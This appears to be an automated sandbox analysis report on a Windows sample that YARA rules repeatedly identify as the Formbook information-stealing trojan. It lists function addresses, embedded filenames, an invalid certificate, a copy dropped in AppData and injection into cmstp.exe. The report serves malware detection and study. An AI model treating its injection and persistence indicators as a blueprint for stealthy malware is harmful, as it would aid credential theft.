Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Code function: 11_2_0695AEA8	11_2_0695AEA8
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Code function: 11_2_0C700310	11_2_0C700310
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Code function: 11_2_0C702F50	11_2_0C702F50
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_003CB634	13_2_003CB634
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04C4E4F6	13_2_04C4E4F6
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04C52446	13_2_04C52446
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04C44420	13_2_04C44420
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04C60591	13_2_04C60591
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04BA0535	13_2_04BA0535
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04BBC6E0	13_2_04BBC6E0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04B9C7C0	13_2_04B9C7C0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04BA0770	13_2_04BA0770
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04BC4750	13_2_04BC4750
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04C32000	13_2_04C32000
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04C581CC	13_2_04C581CC
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04C541A2	13_2_04C541A2
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04C601AA	13_2_04C601AA
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04C28158	13_2_04C28158
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04B90100	13_2_04B90100
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04C3A118	13_2_04C3A118
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04C202C0	13_2_04C202C0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04C40274	13_2_04C40274
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04C603E6	13_2_04C603E6
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04BAE3F0	13_2_04BAE3F0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04C5A352	13_2_04C5A352
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04B90CF2	13_2_04B90CF2
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04C40CB5	13_2_04C40CB5
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04BA0C00	13_2_04BA0C00
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04BB8DBF	13_2_04BB8DBF
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04B9ADE0	13_2_04B9ADE0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04BAAD00	13_2_04BAAD00
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04C3CD1F	13_2_04C3CD1F
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04C5EEDB	13_2_04C5EEDB
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04BB2E90	13_2_04BB2E90
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04C5CE93	13_2_04C5CE93
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04C5EE26	13_2_04C5EE26
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04BA0E59	13_2_04BA0E59
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04BACFE0	13_2_04BACFE0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04C1EFA0	13_2_04C1EFA0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04B92FC8	13_2_04B92FC8
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04C14F40	13_2_04C14F40
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04BC0F30	13_2_04BC0F30
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04BE2F28	13_2_04BE2F28
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04C42F30	13_2_04C42F30
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04B868B8	13_2_04B868B8
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04BCE8F0	13_2_04BCE8F0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04BAA840	13_2_04BAA840
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04BA2840	13_2_04BA2840
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04BA29A0	13_2_04BA29A0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04C6A9A6	13_2_04C6A9A6
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04BB6962	13_2_04BB6962
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04B9EA80	13_2_04B9EA80
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04C56BD7	13_2_04C56BD7
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04C5AB40	13_2_04C5AB40
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04B91460	13_2_04B91460
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04C5F43F	13_2_04C5F43F
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04C695C3	13_2_04C695C3
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04C3D5B0	13_2_04C3D5B0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04C57571	13_2_04C57571
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04C516CC	13_2_04C516CC
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04BE5630	13_2_04BE5630
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04C5F7B0	13_2_04C5F7B0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04C4F0CC	13_2_04C4F0CC
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04C5F0E0	13_2_04C5F0E0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04C570E9	13_2_04C570E9
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04BA70C0	13_2_04BA70C0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04BAB1B0	13_2_04BAB1B0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04C6B16B	13_2_04C6B16B
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04B8F172	13_2_04B8F172
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04BD516C	13_2_04BD516C
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04BA52A0	13_2_04BA52A0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04C412ED	13_2_04C412ED
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04BBB2C0	13_2_04BBB2C0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04BE739A	13_2_04BE739A
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04C5132D	13_2_04C5132D
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04B8D34C	13_2_04B8D34C
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04C5FCF2	13_2_04C5FCF2
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04C19C32	13_2_04C19C32
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04BBFDC0	13_2_04BBFDC0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04C51D5A	13_2_04C51D5A
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04C57D73	13_2_04C57D73
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04BA3D40	13_2_04BA3D40
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04BA9EB0	13_2_04BA9EB0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04BA1F92	13_2_04BA1F92
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04B63FD5	13_2_04B63FD5
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04B63FD2	13_2_04B63FD2
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04C5FFB1	13_2_04C5FFB1
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04C5FF09	13_2_04C5FF09
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04BA38E0	13_2_04BA38E0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04C0D800	13_2_04C0D800
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04C35910	13_2_04C35910
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04BA9950	13_2_04BA9950
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04BBB950	13_2_04BBB950
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04C4DAC6	13_2_04C4DAC6
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04BE5AA0	13_2_04BE5AA0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04C41AA3	13_2_04C41AA3
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04C3DAAC	13_2_04C3DAAC
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04C57A46	13_2_04C57A46
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04C5FA49	13_2_04C5FA49
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04C13A6C	13_2_04C13A6C
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04C15BF0	13_2_04C15BF0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04BBFB80	13_2_04BBFB80
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04BDDBF9	13_2_04BDDBF9
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04C5FB76	13_2_04C5FB76
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_02C1D5A6	13_2_02C1D5A6
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_02C1E558	13_2_02C1E558
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_02C1D8A3	13_2_02C1D8A3
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_02C1D99C	13_2_02C1D99C
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_02C09E4D	13_2_02C09E4D
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_02C09E50	13_2_02C09E50
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_02C02FB0	13_2_02C02FB0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_02C02D90	13_2_02C02D90
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04A8A036	13_2_04A8A036
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04A8E5CD	13_2_04A8E5CD
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04A82D02	13_2_04A82D02
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04A81082	13_2_04A81082
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04A88912	13_2_04A88912
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04A8B232	13_2_04A8B232
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04A85B30	13_2_04A85B30
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_04A85B32	13_2_04A85B32

Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: String function: 01AEEA12 appears 86 times
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: String function: 01AB5130 appears 58 times
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: String function: 01A6B970 appears 280 times
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: String function: 01AFF290 appears 105 times
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: String function: 01AC7E54 appears 111 times
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: String function: 04C1F290 appears 105 times
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: String function: 04BD5130 appears 58 times
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: String function: 04BE7E54 appears 111 times
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: String function: 04B8B970 appears 280 times
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: String function: 003CE951 appears 100 times
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: String function: 04C0EA12 appears 86 times

Source: CZyOWoN2hiszA6d.exe

Static PE information: invalid certificate

Source: CZyOWoN2hiszA6d.exe, 00000000.00000002.2061854564.00000000072A0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameFGMaker.dll2 vs CZyOWoN2hiszA6d.exe
Source: CZyOWoN2hiszA6d.exe, 00000000.00000002.2047034482.000000000442E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs CZyOWoN2hiszA6d.exe
Source: CZyOWoN2hiszA6d.exe, 00000000.00000002.2062861864.00000000097E0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs CZyOWoN2hiszA6d.exe
Source: CZyOWoN2hiszA6d.exe, 00000000.00000002.2046045143.0000000002A51000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameFGMaker.dll2 vs CZyOWoN2hiszA6d.exe
Source: CZyOWoN2hiszA6d.exe, 00000000.00000002.2061926618.00000000072EE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePowerShell.EXE.MUIj% vs CZyOWoN2hiszA6d.exe
Source: CZyOWoN2hiszA6d.exe, 00000000.00000002.2061926618.00000000072EE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePowerShell.EXEj% vs CZyOWoN2hiszA6d.exe
Source: CZyOWoN2hiszA6d.exe, 00000009.00000002.2120275621.0000000001B6D000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs CZyOWoN2hiszA6d.exe
Source: CZyOWoN2hiszA6d.exe, 00000009.00000002.2119998400.0000000001710000.00000040.10000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameCMSTP.EXE` vs CZyOWoN2hiszA6d.exe
Source: CZyOWoN2hiszA6d.exe, 00000009.00000002.2120061391.0000000001797000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCMSTP.EXE` vs CZyOWoN2hiszA6d.exe
Source: CZyOWoN2hiszA6d.exe	Binary or memory string: OriginalFilenameKyWu.exe@ vs CZyOWoN2hiszA6d.exe

Source: CZyOWoN2hiszA6d.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cmstp.exe "C:\Windows\SysWOW64\cmstp.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cmstp.exe "C:\Windows\SysWOW64\cmstp.exe"			Jump to behavior

Source: 9.2.CZyOWoN2hiszA6d.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 9.2.CZyOWoN2hiszA6d.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.2.CZyOWoN2hiszA6d.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.2.CZyOWoN2hiszA6d.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 9.2.CZyOWoN2hiszA6d.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.2.CZyOWoN2hiszA6d.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.CZyOWoN2hiszA6d.exe.46003e0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0.2.CZyOWoN2hiszA6d.exe.46003e0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.CZyOWoN2hiszA6d.exe.46003e0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.CZyOWoN2hiszA6d.exe.4670200.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0.2.CZyOWoN2hiszA6d.exe.4670200.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.CZyOWoN2hiszA6d.exe.4670200.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.4474632903.00000000049B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.4474632903.00000000049B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.4474632903.00000000049B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.4474232740.0000000003010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.4474232740.0000000003010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.4474232740.0000000003010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.2119442829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.2119442829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.2119442829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000014.00000002.2233818819.0000000000120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000014.00000002.2233818819.0000000000120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000014.00000002.2233818819.0000000000120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.2047034482.000000000442E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.2047034482.000000000442E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.2047034482.000000000442E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.4473749017.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.4473749017.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.4473749017.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.4489782694.0000000010A4E000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
Source: Process Memory Space: CZyOWoN2hiszA6d.exe PID: 1076, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
